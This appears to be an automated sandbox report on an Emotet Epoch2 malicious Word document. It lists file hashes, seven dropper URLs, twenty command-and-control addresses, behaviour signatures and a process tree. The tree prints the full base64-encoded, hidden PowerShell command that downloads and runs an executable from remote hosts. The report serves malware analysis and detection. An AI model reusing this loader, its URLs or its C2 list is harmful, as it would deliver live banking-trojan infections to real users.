emotet | a34d385ac828fa38251b3c56b9dd58dd261e8ea7b9d8b8a0b6d02ab7403448dd

General

Target

rep_37740235757282600901387.doc
Size

175KB
MD5

5c879823a2a6ee415f4c773d55a0d680
SHA1

280168469b69cb8b0d8cba43378d72fa9b33a146
SHA256

fd63dec89395fb5024155fdfa24256fc31add9f974f2870e11fef458790d425f
SHA512

0e57ad0252433edcdbe98154b0e0c827d15f6147d9d623371d03072b89fdec74dc14d7b8292ce4de04cb8bd0b32f982c68c49815551ea7fbc0253b7b62b4e822

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://da-industrial.com/js/9IdLP/

exe.dropper

http://daprofesional.com/data4/hWgWjTV/

exe.dropper

https://dagranitegiare.com/wp-admin/tV/

exe.dropper

http://www.outspokenvisions.com/wp-includes/aWoM/

exe.dropper

http://mobsouk.com/wp-includes/UY30R/

exe.dropper

http://biglaughs.org/smallpotatoes/Y/

exe.dropper

https://ngllogistics.africa/adminer/W3mkB/

Extracted

Family

emotet

Botnet

Epoch2

C2

102.182.145.130:80

173.173.254.105:80

64.207.182.168:8080

51.89.199.141:8080

167.114.153.111:8080

173.63.222.65:80

218.147.193.146:80

59.125.219.109:443

172.104.97.173:8080

190.162.215.233:80

68.115.186.26:80

78.188.106.53:443

190.240.194.77:443

24.133.106.23:80

80.227.52.78:80

79.137.83.50:443

120.150.218.241:443

62.171.142.179:8080

194.4.58.192:7080

62.30.7.67:443

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2916 852 POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2916	852	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/3796-15-0x0000000002B60000-0x0000000002B94000-memory.dmp	emotet
behavioral2/memory/3796-16-0x0000000002BA0000-0x0000000002BD3000-memory.dmp	emotet
behavioral2/memory/2688-19-0x0000000000DD0000-0x0000000000E04000-memory.dmp	emotet
behavioral2/memory/2688-20-0x0000000002920000-0x0000000002953000-memory.dmp	emotet

Blacklisted process makes network request 1 IoCs

Processes:

POwersheLL.exe

flow pid process

12 2916 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

Ale7g_8.exeSMBHelperClass.exe

pid process

3796 Ale7g_8.exe
2688 SMBHelperClass.exe
Drops file in System32 directory 1 IoCs

Processes:

Ale7g_8.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\KBDMYAN\SMBHelperClass.exe Ale7g_8.exe

flow	pid	process
12	2916	POwersheLL.exe

pid	process
3796	Ale7g_8.exe
2688	SMBHelperClass.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\KBDMYAN\SMBHelperClass.exe	Ale7g_8.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1036 WINWORD.EXE
1036 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
1036	WINWORD.EXE
1036	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

POwersheLL.exeSMBHelperClass.exe

pid	process
2916	POwersheLL.exe
2916	POwersheLL.exe
2916	POwersheLL.exe
2688	SMBHelperClass.exe
2688	SMBHelperClass.exe
2688	SMBHelperClass.exe
2688	SMBHelperClass.exe
2688	SMBHelperClass.exe
2688	SMBHelperClass.exe
2688	SMBHelperClass.exe
2688	SMBHelperClass.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 2916 POwersheLL.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

1036 WINWORD.EXE
1036 WINWORD.EXE
1036 WINWORD.EXE
1036 WINWORD.EXE
1036 WINWORD.EXE
1036 WINWORD.EXE
1036 WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	2916	POwersheLL.exe

pid	process
1036	WINWORD.EXE
1036	WINWORD.EXE
1036	WINWORD.EXE
1036	WINWORD.EXE
1036	WINWORD.EXE
1036	WINWORD.EXE
1036	WINWORD.EXE

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

Ale7g_8.exe

description	pid	process	target process
PID 3796 wrote to memory of 2688	3796	Ale7g_8.exe	SMBHelperClass.exe
PID 3796 wrote to memory of 2688	3796	Ale7g_8.exe	SMBHelperClass.exe
PID 3796 wrote to memory of 2688	3796	Ale7g_8.exe	SMBHelperClass.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\rep_37740235757282600901387.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1036

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPAC4AZABJACcALAAnAE0AJwApACAAIAApACAAOwAgACAAIABzAGUAdAAgACAAVAB4AHkAUwBlAG8AIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADAAfQB7ADcAfQB7ADUAfQB7ADYAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADgAfQB7ADMAfQAiAC0ARgAnAFMAWQBzAFQARQAnACwAJwBUAE0AJwAsACcASQBOACcALAAnAEUAUgAnACwAJwBwAE8AJwAsACcATgBlAFQALgBzAGUAJwAsACcAUgBWAEkAQwBFACcALAAnAE0ALgAnACwAJwBBAE4AYQBHACcAKQApACAAOwAgACAAJABOAGIAZgA1AHQAZwAzAD0AKAAnAEIAOQAnACsAJwB5AHAAJwArACgAJwA5ADAAJwArACcAcwAnACkAKQA7ACQAVgB4AG4AbAByAGUAMAA9ACQAQwBsAHUAZABrAGoAeAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA2AHIAMQB0AHUAeQA7ACQASwB5ADMAcQAwAGUAOAA9ACgAKAAnAFIAcQAnACsAJwBkAHgAJwApACsAJwB3AG8AJwArACcANQAnACkAOwAgACAAKAAgACAARABpAHIAIAAgAHYAYQBSAGkAQQBiAGwAZQA6ADAAWgB4ACkALgB2AGEAbAB1AEUAOgA6ACIAQwByAGUAQQBUAGAARQBgAGQASQBSAEUAYwBgAFQAYABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbgBEAHAAJwArACcASgByAGIAJwApACsAKAAnAGUAJwArACcAdgBrADQAbgAnACkAKwAnAEQAJwArACcAcAAnACsAKAAnAEMAJwArACcAYwB3AHIAXwAyAGgAJwApACsAJwBuAEQAJwArACcAcAAnACkAIAAtAFIAZQBQAGwAQQBjAEUAIAAoACcAbgAnACsAJwBEAHAAJwApACwAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQAUAB5AG8AegBnAGUAbwA9ACgAKAAnAEoANQBmACcAKwAnAHkAMQAnACkAKwAnAGMAJwArACcAYwAnACkAOwAgACgAIAAgAHYAYQBSAGkAQQBCAEwARQAgAFQAeABZAFMARQBvACAAIAApAC4AVgBhAGwAdQBFADoAOgAiAFMAZQBjAFUAcgBJAGAAVABZAHAAYABSAGAATwB0AE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQASAB1AGEAagBnAGIAMAA9ACgAKAAnAEoAbgAnACsAJwBvACcAKQArACcANQBnACcAKwAnAGEAMQAnACkAOwAkAEIAYgAyADgAdQBtAG8AIAA9ACAAKAAoACcAQQBsAGUAJwArACcANwBnACcAKQArACcAXwA4ACcAKQA7ACQASABzAGMAZQBfAGoAcwA9ACgAJwBLAHYAJwArACgAJwBuAGIAJwArACcAbwB2AF8AJwApACkAOwAkAFMAcABrADUAMQB1AGUAPQAoACgAJwBDACcAKwAnADcAeABvACcAKQArACcAOQBnACcAKwAnAGwAJwApADsAJABTAGMAdQBzAGIAawBqAD0AJABIAE8ATQBFACsAKAAoACcANQAnACsAJwB0ACcAKwAoACcAZgAnACsAJwBKAHIAYgBlAHYAJwArACcAawAnACkAKwAoACcANAA1AHQAZgAnACsAJwBDAGMAJwArACcAdwAnACkAKwAnAHIAJwArACgAJwBfADIAaAAnACsAJwA1AHQAZgAnACkAKQAgAC0AcgBFAHAAbABBAEMARQAgACAAKABbAEMAaABBAFIAXQA1ADMAKwBbAEMAaABBAFIAXQAxADEANgArAFsAQwBoAEEAUgBdADEAMAAyACkALABbAEMAaABBAFIAXQA5ADIAKQArACQAQgBiADIAOAB1AG0AbwArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFEAMQBfAHkAMAA1AF8APQAoACcAVwAnACsAKAAnADQAJwArACcAcQB2AHkAJwApACsAJwB6ADgAJwApADsAJABPAGQAYgAzAGgAZgAzAD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABOAGUAdAAuAFcARQBCAGMAbABJAEUATgB0ADsAJABBAG4AYgB5AHQAMQB5AD0AKAAnAGgAJwArACgAJwB0AHQAcAA6ACcAKwAnAF0AWwAnACsAJwAoAHMAKQBdACcAKQArACgAKAAnAHcAXQAnACsAJwBbACgAJwApACkAKwAoACgAJwBzACkAJwArACcAXQB3ACcAKQApACsAKAAnAGQAYQAnACsAJwAtACcAKQArACcAaQAnACsAJwBuACcAKwAnAGQAdQAnACsAKAAnAHMAJwArACcAdAByAGkAYQBsAC4AJwArACcAYwAnACsAJwBvACcAKQArACcAbQBdACcAKwAoACcAWwAoAHMAKQBdACcAKwAnAHcAJwArACcAagBzACcAKQArACgAKAAnAF0AJwArACcAWwAoACcAKQApACsAKAAoACcAcwAnACsAJwApAF0AdwA5AEkAZABMACcAKwAnAFAAXQBbACcAKwAnACgAcwAnACsAJwApAF0AdwAnACsAJwBAAGgAJwApACkAKwAoACcAdAAnACsAJwB0AHAAOgBdACcAKQArACgAJwBbACgAcwAnACsAJwApAF0AJwApACsAJwB3ACcAKwAoACcAXQAnACsAJwBbACgAcwApAF0AJwApACsAKAAnAHcAZABhAHAAJwArACcAcgBvACcAKwAnAGYAZQBzAGkAbwBuAGEAJwArACcAbAAuAGMAJwApACsAJwBvAG0AJwArACgAJwBdAFsAKABzACcAKwAnACkAJwArACcAXQAnACkAKwAnAHcAJwArACgAJwBkACcAKwAnAGEAdABhACcAKQArACgAJwA0AF0AWwAoAHMAJwArACcAKQBdAHcAaAAnACkAKwAoACcAVwBnAFcAJwArACcAagBUACcAKQArACgAJwBWAF0AJwArACcAWwAnACkAKwAoACcAKABzACkAXQB3AEAAaAB0AHQAcAAnACsAJwBzADoAXQBbACgAcwAnACsAJwApAF0AJwArACcAdwAnACsAJwBdACcAKQArACcAWwAnACsAKAAnACgAcwApACcAKwAnAF0AdwBkAGEAZwAnACsAJwByAGEAJwApACsAJwBuAGkAJwArACcAdAAnACsAKAAnAGUAZwAnACsAJwBpAGEAJwApACsAKAAnAHIAZQAuAGMAJwArACcAbwAnACkAKwAnAG0AXQAnACsAKAAnAFsAJwArACcAKABzACkAJwApACsAKAAnAF0AdwB3ACcAKwAnAHAALQBhACcAKwAnAGQAbQAnACsAJwBpAG4AXQBbACgAcwApACcAKwAnAF0AdwB0ACcAKQArACgAJwBWAF0AWwAnACsAJwAoAHMAJwArACcAKQAnACkAKwAoACcAXQB3AEAAJwArACcAaAAnACkAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAnACsAJwBdAFsAJwApACsAKAAnACgAcwApAF0AdwBdAFsAJwArACcAKABzACcAKwAnACkAXQB3AHcAdwAnACsAJwB3ACcAKwAnAC4AbwB1AHQAJwArACcAcwAnACsAJwBwACcAKQArACgAJwBvAGsAJwArACcAZQAnACkAKwAnAG4AdgAnACsAJwBpACcAKwAoACcAcwAnACsAJwBpAG8AbgBzAC4AJwApACsAKAAnAGMAbwBtACcAKwAnAF0AJwApACsAJwBbACcAKwAoACcAKABzACkAXQB3ACcAKwAnAHcAcAAnACsAJwAtAGkAbgAnACkAKwAoACcAYwBsAHUAJwArACcAZAAnACkAKwAoACcAZQBzAF0AWwAoAHMAKQAnACsAJwBdAHcAYQBXACcAKwAnAG8AJwArACcATQAnACkAKwAoACcAXQAnACsAJwBbACgAJwArACcAcwApAF0AdwAnACkAKwAoACcAQAAnACsAJwBoAHQAdABwADoAXQAnACkAKwAoACcAWwAoAHMAKQAnACsAJwBdAHcAXQBbACgAJwArACcAcwApACcAKQArACgAJwBdAHcAbQBvACcAKwAnAGIAcwAnACkAKwAoACcAbwAnACsAJwB1AGsALgBjACcAKQArACgAKAAnAG8AJwArACcAbQBdAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACsAJwBdAHcAdwBwAC0AJwApACkAKwAnAGkAbgAnACsAJwBjACcAKwAnAGwAJwArACgAJwB1AGQAZQAnACsAJwBzAF0AJwArACcAWwAnACkAKwAoACcAKABzACkAXQAnACsAJwB3ACcAKQArACgAJwBVAFkAJwArACcAMwAwAFIAXQAnACkAKwAoACcAWwAoAHMAJwArACcAKQBdAHcAJwArACcAQAAnACsAJwBoACcAKwAnAHQAdABwADoAXQBbACcAKQArACgAJwAoACcAKwAnAHMAKQBdAHcAJwApACsAKAAnAF0AWwAnACsAJwAoAHMAKQAnACkAKwAoACcAXQAnACsAJwB3AGIAJwApACsAJwBpACcAKwAoACcAZwAnACsAJwBsAGEAdQBnAGgAJwArACcAcwAnACkAKwAoACgAJwAuAG8AJwArACcAcgAnACsAJwBnAF0AWwAoAHMAJwApACkAKwAoACgAJwApAF0AJwApACkAKwAoACcAdwBzACcAKwAnAG0AYQBsAGwAcABvAHQAJwArACcAYQB0AG8AJwApACsAJwBlAHMAJwArACgAKAAnAF0AJwArACcAWwAoAHMAJwApACkAKwAoACgAJwApAF0AdwBZAF0AJwArACcAWwAoAHMAJwArACcAKQBdAHcAJwArACcAQABoACcAKwAnAHQAdABwAHMAOgBdAFsAKABzACkAJwApACkAKwAnAF0AdwAnACsAKAAnAF0AWwAoACcAKwAnAHMAKQBdAHcAbgAnACsAJwBnACcAKQArACgAJwBsAGwAJwArACcAbwAnACkAKwAoACcAZwBpAHMAdAAnACsAJwBpACcAKQArACgAJwBjAHMALgAnACsAJwBhACcAKQArACcAZgAnACsAKAAnAHIAaQBjAGEAXQAnACsAJwBbACcAKwAnACgAJwArACcAcwApAF0AdwAnACkAKwAnAGEAZAAnACsAKAAnAG0AaQAnACsAJwBuACcAKQArACcAZQByACcAKwAnAF0AJwArACgAJwBbACgAcwAnACsAJwApAF0AdwAnACsAJwBXADMAbQAnACkAKwAnAGsAJwArACgAKAAnAEIAJwArACcAXQBbACgAcwAnACkAKQArACgAKAAnACkAJwArACcAXQB3ACcAKQApACkALgAiAHIAZQBwAGAATABBAGMARQAiACgAKAAnAF0AJwArACcAWwAnACsAKAAnACgAcwApAF0AJwArACcAdwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBQAGAAbABJAFQAIgAoACQASQB2AGcAMwB6AGMAdQAgACsAIAAkAFYAeABuAGwAcgBlADAAIAArACAAJABKAHoAYQBlAHcAZAB5ACkAOwAkAEcAYwBvAHkAdgBsAHYAPQAoACgAJwBLAGYAJwArACcAXwAnACkAKwAoACcAOQAnACsAJwBlAHQAMQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQQA4AGkAMwBrAGUAMQAgAGkAbgAgACQAQQBuAGIAeQB0ADEAeQApAHsAdAByAHkAewAkAE8AZABiADMAaABmADMALgAiAGQATwBgAFcAbgBMAE8AQQBgAGQAZgBJAEwAZQAiACgAJABBADgAaQAzAGsAZQAxACwAIAAkAFMAYwB1AHMAYgBrAGoAKQA7ACQAWgBoAGMAbgBhAHUAeAA9ACgAKAAnAEUAawAnACsAJwBrACcAKQArACgAJwBqACcAKwAnADQANwB0ACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFMAYwB1AHMAYgBrAGoAKQAuACIATABFAG4AYABHAFQAaAAiACAALQBnAGUAIAA0ADUAMQA5ADkAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuACcAKQArACgAJwAzADIAXwAnACsAJwBQAHIAbwBjACcAKwAnAGUAJwApACsAJwBzACcAKwAnAHMAJwApACkALgAiAGMAUgBgAGUAYQBUAEUAIgAoACQAUwBjAHUAcwBiAGsAagApADsAJABHAGwAdwBrAGkANgBhAD0AKAAnAEkAJwArACcAbQAnACsAKAAnAHQAZAAnACsAJwB4AHYANgAnACkAKQA7AGIAcgBlAGEAawA7ACQAUABmAHAAYgBsAGgAMQA9ACgAJwBWAHMAJwArACgAJwBsAGEAbAAnACsAJwBjACcAKQArACcAdQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYANAA3AGkAZQBmADIAPQAoACgAJwBCAG4AJwArACcAegBpAGQAJwApACsAJwByAHQAJwApAA==
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916

C:\Users\Admin\Jrbevk4\Ccwr_2h\Ale7g_8.exe
C:\Users\Admin\Jrbevk4\Ccwr_2h\Ale7g_8.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\SysWOW64\KBDMYAN\SMBHelperClass.exe
"C:\Windows\SysWOW64\KBDMYAN\SMBHelperClass.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2688

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:3208

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:3880

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:2528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Jrbevk4\Ccwr_2h\Ale7g_8.exe
MD5
659a9d46029e27c11fa698a5ea8c5fb6

SHA1
7447ed98cfdcd9f6a45b6baa6a5e2975ef4befe6

SHA256
73f14aed5bd272c0b76647287dae7dabfaefd53f0705d4ce1254bde9ca42d824

SHA512
eec0f789948918647d19b5e903c93612e12be7cbe83707890332bbc1aa84cc5ce0d20b9639d4af77200ccf7090e3b95145a8b381e1b0dab3c57016837293bf66

Download Submit
C:\Users\Admin\Jrbevk4\Ccwr_2h\Ale7g_8.exe
MD5
659a9d46029e27c11fa698a5ea8c5fb6

SHA1
7447ed98cfdcd9f6a45b6baa6a5e2975ef4befe6

SHA256
73f14aed5bd272c0b76647287dae7dabfaefd53f0705d4ce1254bde9ca42d824

SHA512
eec0f789948918647d19b5e903c93612e12be7cbe83707890332bbc1aa84cc5ce0d20b9639d4af77200ccf7090e3b95145a8b381e1b0dab3c57016837293bf66

Download Submit
C:\Windows\SysWOW64\KBDMYAN\SMBHelperClass.exe
MD5
659a9d46029e27c11fa698a5ea8c5fb6

SHA1
7447ed98cfdcd9f6a45b6baa6a5e2975ef4befe6

SHA256
73f14aed5bd272c0b76647287dae7dabfaefd53f0705d4ce1254bde9ca42d824

SHA512
eec0f789948918647d19b5e903c93612e12be7cbe83707890332bbc1aa84cc5ce0d20b9639d4af77200ccf7090e3b95145a8b381e1b0dab3c57016837293bf66

Download Submit
memory/1036-6-0x00000234731F6000-0x0000023473224000-memory.dmp

Filesize
184KB

Download
memory/1036-0-0x00007FFC482D0000-0x00007FFC48907000-memory.dmp

Filesize
6.2MB

Download
memory/2688-17-0x0000000000000000-mapping.dmp

Download
memory/2688-19-0x0000000000DD0000-0x0000000000E04000-memory.dmp

Filesize
208KB

Download
memory/2688-20-0x0000000002920000-0x0000000002953000-memory.dmp

Filesize
204KB

Download
memory/2916-12-0x000001947DA20000-0x000001947DA21000-memory.dmp

Filesize
4KB

Download
memory/2916-11-0x000001947D670000-0x000001947D671000-memory.dmp

Filesize
4KB

Download
memory/2916-10-0x00007FFC3A290000-0x00007FFC3AC7C000-memory.dmp

Filesize
9.9MB

Download
memory/3796-15-0x0000000002B60000-0x0000000002B94000-memory.dmp

Filesize
208KB

Download
memory/3796-16-0x0000000002BA0000-0x0000000002BD3000-memory.dmp

Filesize
204KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads